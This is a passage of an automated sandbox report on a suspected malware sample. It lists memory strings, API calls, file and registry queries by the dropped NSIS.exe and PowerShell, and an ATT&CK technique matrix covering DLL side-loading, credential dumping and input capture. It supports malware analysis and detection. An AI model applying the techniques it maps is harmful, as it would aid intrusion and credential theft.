Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..\..\third_party\webrtc\modules\desktop_capture\win\window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman..\..\third_party\webrtc\modules\desktop_capture\cropping_window_capturer.ccWindow no longer on top when ScreenCapturer finishesScreenCapturer failed to capture a frameWindow rect is emptyWindow is outside of the captured displaySysShadowWebRTC.DesktopCapture.Win.WindowGdiCapturerFrameTime..\..\third_party\webrtc\modules\desktop_capture\win\window_capturer_win_gdi.ccWindow hasn't been selected: Target window has been closed.Failed to get drawable window area: Failed to get window DC: Failed to create frame.Both PrintWindow() and BitBlt() failed.Capturing owned window failed (previous error/warning pertained to that)WindowCapturerWinGdi::CaptureFrameWebRTC.DesktopCapture.BlankFrameDetectedWebRTC.DesktopCapture.PrimaryCapturerSelectSourceErrorWebRTC.DesktopCapture.PrimaryCapturerErrorWebRTC.DesktopCapture.PrimaryCapturerPermanentErrordwmapi.dllDwmEnableComposition..\..\third_party\webrtc\modules\desktop_capture\win\screen_capturer_win_gdi.ccFailed to capture screen by GDI.WebRTC.DesktopCapture.Win.ScreenGdiCapturerFrameTimedesktop_dc_memory_dc_Failed to get screen rect.Failed to create frame buffer.Failed to select current bitmap into memery dc.BitBlt failedScreenCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\cursor.ccwebrtc::CreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = `
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF7810A63C0 cpuid 19_2_00007FF7810A63C0
Source: C:\Windows \System32\winSAT.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,22_2_00007FF781019BA4
Source: C:\Windows \System32\winSAT.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,iswdigit,iswdigit,iswdigit,22_2_00007FF780FB2BC4
Source: C:\Windows \System32\winSAT.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,31_2_00007FF781019BA4
Source: C:\Windows \System32\winSAT.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,iswdigit,iswdigit,iswdigit,31_2_00007FF780FB2BC4
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs\NSIS VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs\NSIS\resources\app.asar VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\WinSAT.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows \System32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs\NSIS VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Roaming\NSIS\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows \System32 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Roaming\MyElectronApp VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Roaming\MyElectronApp\version.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9DA44 GetSystemTimeAsFileTime,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9DA44
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		111
Input Capture		1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
Windows Service		1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory3
File and Directory Discovery		Remote Desktop Protocol111
Input Capture		1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter		12
Registry Run Keys / Startup Folder		1
Windows Service		2
Obfuscated Files or Information		Security Account Manager48
System Information Discovery		SMB/Windows Admin Shares1
Clipboard Data		SteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell		Login Hook12
Process Injection		1
Software Packing		NTDS241
Security Software Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Registry Run Keys / Startup Folder		1
DLL Side-Loading		LSA Secrets3
